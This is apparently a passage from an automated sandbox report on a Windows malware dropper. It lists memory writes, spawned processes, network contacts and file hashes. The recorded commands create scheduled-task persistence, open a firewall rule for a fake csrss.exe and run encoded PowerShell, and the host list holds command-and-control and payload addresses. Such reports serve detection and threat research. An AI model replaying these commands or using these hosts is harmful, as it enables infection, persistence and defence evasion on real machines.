PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1900 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 1552 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe
PID 1440 wrote to memory of 1512 N/A C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe

"C:\Users\Admin\AppData\Local\Temp\faae62d9ef3a65ae1dae20d55b8e787661aaf452ad3b6bdd80ea267d3bd070bd.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x2fc

C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

"C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe"

C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

"C:\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe"

C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

"C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe"

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"

C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe

"C:\Users\Admin\Pictures\Adobe Films\F6QaJ5EoyJhyXoJ6l5zc4g1N.exe"

C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe

"C:\Users\Admin\Pictures\Adobe Films\GPNCPhTW1uxSeDe_osToE6WV.exe"

C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe

"C:\Users\Admin\Pictures\Adobe Films\ogc5IjIcAzvdzqsUfmC8ju8H.exe"

C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe

"C:\Users\Admin\Pictures\Adobe Films\Dad1ZNgVBRUA7NZQeXaeM_0e.exe"

C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe

"C:\Users\Admin\Pictures\Adobe Films\JUx8XR8Z1hBp7DKra5m64vND.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -?

C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe

"C:\Users\Admin\Pictures\Adobe Films\eeMXA1PvRwQEPGdOiDQDaBjy.exe"

C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe

"C:\Users\Admin\Pictures\Adobe Films\Ykfki98dvb3qPmhwtgmBv31L.exe"

C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe

"C:\Users\Admin\Pictures\Adobe Films\f1deYbzXiXvkh0j_e5Nz8E7D.exe"

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe

"C:\Users\Admin\Pictures\Adobe Films\Go_wbkeyto0LyXvg74s6mSHO.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

C:\Windows\SysWOW64\cmd.exe

cmd /c cmd < Inebriarti.htm & ping -n 5 localhost

C:\Windows\SysWOW64\control.exe

"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\~9LBUZDq.CPL",

C:\Windows\SysWOW64\cmd.exe

cmd

C:\Windows\SysWOW64\tasklist.exe

tasklist /FI "imagename eq PSUAService.exe"

C:\Windows\SysWOW64\find.exe

find /I /N "psuaservice.exe"

C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe

"C:\Users\Admin\Pictures\Adobe Films\LEhUV4Bu2jo02_gBtm4NyWn4.exe"

C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe

"C:\Users\Admin\Pictures\Adobe Films\ed8OaHBYObpsBB72qmS5fqYf.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SETUP_~2.EXE

C:\Windows\SysWOW64\findstr.exe

findstr /V /R "^DPPUlpMDoxxhVrUIPtlDSFKoNmARJTULbxHxsooLczeCBvhhRbTNaFvXtGiKJUTgAJQAcAsHWmomCiGsjjZjquaSYKfKqbwAmNeS$" Strette.htm

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tal.exe.pif

Tal.exe.pif H

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 5

C:\Windows\SysWOW64\PING.EXE

ping -n 5 localhost

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220705110445.log C:\Windows\Logs\CBS\CbsPersist_20220705110445.cab

C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

"C:\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

"C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe"

Network

Country Destination Domain Proto
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 193.233.185.125:80 tcp
US 193.233.185.125:80 tcp
US 193.233.185.125:80 tcp
US 193.233.185.125:80 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 8.8.8.8:53 maper.info udp
US 8.8.8.8:53 fdhjtnthdngnd.click udp
DE 148.251.234.93:80 maper.info tcp
US 188.114.96.0:80 fdhjtnthdngnd.click tcp
US 8.8.8.8:53 fantadentalperu.com udp
US 8.8.8.8:53 timetogof.at udp
US 8.8.8.8:53 iranparsa-novin.com udp
IR 185.88.178.71:80 iranparsa-novin.com tcp
KR 211.119.84.112:80 timetogof.at tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
RU 185.106.93.10:80 185.106.93.10 tcp
SC 185.215.113.15:80 185.215.113.15 tcp
RU 193.106.191.246:80 193.106.191.246 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 2.56.57.65:80 2.56.57.65 tcp
NL 212.193.30.45:80 212.193.30.45 tcp
KR 211.119.84.112:80 timetogof.at tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 188.114.96.0:443 fdhjtnthdngnd.click tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:80 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
DE 148.251.234.93:443 maper.info tcp
IR 185.88.178.71:80 iranparsa-novin.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
CA 192.99.207.151:80 fantadentalperu.com tcp
US 162.159.134.233:80 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
CA 192.99.207.151:443 fantadentalperu.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 162.159.134.233:443 cdn.discordapp.com tcp
NL 104.110.191.201:80 apps.identrust.com tcp
IR 185.88.178.71:443 iranparsa-novin.com tcp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.77:443 yandex.ru tcp
NL 212.193.30.45:80 212.193.30.45 tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:443 ipinfo.io tcp
US 8.8.8.8:53 checkip.amazonaws.com udp
IE 52.17.214.221:80 checkip.amazonaws.com tcp
NL 85.202.169.116:80 85.202.169.116 tcp
US 8.8.8.8:53 cnSrufvjrfjAHpXtGtICmuqBsaZF.cnSrufvjrfjAHpXtGtICmuqBsaZF udp
RU 193.106.191.81:23196 tcp
UA 194.36.177.84:19999 tcp
US 8.8.8.8:53 ushatamaiet.xyz udp
LV 94.140.112.166:80 ushatamaiet.xyz tcp
US 8.8.8.8:53 4hmn.short.gy udp
DE 18.184.197.212:443 4hmn.short.gy tcp
US 8.8.8.8:53 t.me udp
US 8.8.8.8:53 jollygiunco.com udp
IT 31.11.32.193:443 jollygiunco.com tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 8.8.8.8:53 mastodon.online udp
FI 95.216.4.252:443 mastodon.online tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
US 8.8.8.8:53 api.ip.sb udp
US 172.67.75.172:443 api.ip.sb tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
IT 31.11.32.193:443 jollygiunco.com tcp
DE 18.184.197.212:443 4hmn.short.gy tcp
SC 185.215.113.75:81 tcp
IT 31.11.32.193:443 jollygiunco.com tcp
US 172.67.75.172:443 api.ip.sb tcp
US 8.8.8.8:53 4hmn.short.gy udp
DE 18.184.197.212:443 4hmn.short.gy tcp
US 8.8.8.8:53 10185d66-3aa4-473b-99b6-78da7f09ff1e.uuid.3ebu257qh2dlauxqj7cgv3i55e4orb55mwgqf4tq7eicsa3dfhr4aaid.onion udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
FI 95.216.4.252:443 mastodon.online tcp

Files

memory/2024-54-0x0000000076011000-0x0000000076013000-memory.dmp

memory/2024-55-0x0000000000230000-0x000000000032A000-memory.dmp

memory/1440-57-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-58-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-60-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-62-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-63-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-65-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-68-0x0000000000414420-mapping.dmp

memory/1440-69-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-73-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-77-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-79-0x00000000000D0000-0x0000000000108000-memory.dmp

memory/1440-80-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/1440-81-0x0000000003EE0000-0x0000000004163000-memory.dmp

memory/1708-82-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

memory/1080-84-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

memory/840-88-0x0000000000000000-mapping.dmp

C:\Users\Admin\Pictures\Adobe Films\A9vmbCpQfH4W6f0aB0vxhdUU.exe

MD5 15777ae423417df86584aac2148b5d44
SHA1 e5d89fc00ee12af8168b5ff7a947f2718f95ea6c
SHA256 3873e8543793c56c72c643a82c64a9c9163ce2e931dc57c14392868bff4fe7f5
SHA512 9fedb0be63761c533d010656197c1778d496caadb4c83cb7a32841a11535ff5fd0de51a2c7b59e3c5663ab8367a4ff60f4aa45284421dd553c0efc25f3bb13a1

\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
SHA512 55405c02c17508250be84461dd527163a53224c34147b51d1dc84d6dd028a6aae5bd8ac9e6be81882fbf2adf9851b2f425e71f9b32ea2df1f2fabfac21fe10c6

memory/1068-95-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\j5OXbWJxFbOBbWXcnRVSkF67.exe

MD5 9b51aacc658896de78bbe14567334f2f
SHA1 72edbe5ad26bac081baf9dba2a5c4ff23e7e254d
SHA256 f690c8889337ac8c3ebcbed491d3797cf1eee5e85493c985dee87778d1309281
SHA512 82b47e8d278d8616414bb1d596be37120b8108283563e15a94ce4358c5a0066d47d4b4b7818be1e8f070949b82d4c645615947a2ab6a2c84d054042392f88429

\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

MD5 22922137714e5791617bc3c9710615b6
SHA1 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256 f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512 ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00

\Users\Admin\Pictures\Adobe Films\MwqBxAfw83ohf9tpkPdPS5bi.exe

MD5 22922137714e5791617bc3c9710615b6
SHA1 78cff80d5ab75b845272c728429446f0807b5ad4
SHA256 f49c22644ec5e45d9188a8727dc2f7750dd5e23bbcb0d24e2455aa7a2ecc1952
SHA512 ca87db57dd91064ef830e3f465dbc970e76f6f7c60612abbf8f08d1dd93186aac560be3853e09e93bd50ee436f9ecf51ae5d17bbd0565448e73f12af49e6bd00

memory/2000-92-0x0000000000000000-mapping.dmp

\Users\Admin\Pictures\Adobe Films\neiBwj8tCYJgC3R5LkFwvL_S.exe

MD5 022300f2f31eb6576f5d92cdc49d8206
SHA1 abd01d801f6463b421f038095d2f062806d509da
SHA256 59fbf550f9edac6eabae2af8b50c760e9b496b96e68cb8b84d8c745d3bb9ec15
SHA512 5ffddbb8a0abb08a69b659d3fb570fde79a0bc8984a835b6699cd13937447ee3aa5228c0b5aaba2ed19fa96509e25bf61830f74cdc07d515de97a7976f75ddfe

C:\Users\Admin\Pictures\Adobe Films\FZtd976f8PkZHgMsntUN9bv4.exe

MD5 f8d8b67dfcec2684e96122cb9aea4daf
SHA1 39ea9ffed4bba9db6635b4aa1a38f79d6a9062b7
SHA256 083e66dc1b7fe9c08ccf244b0620896bfef6f23ad9f9468456d7587aaebc95b5
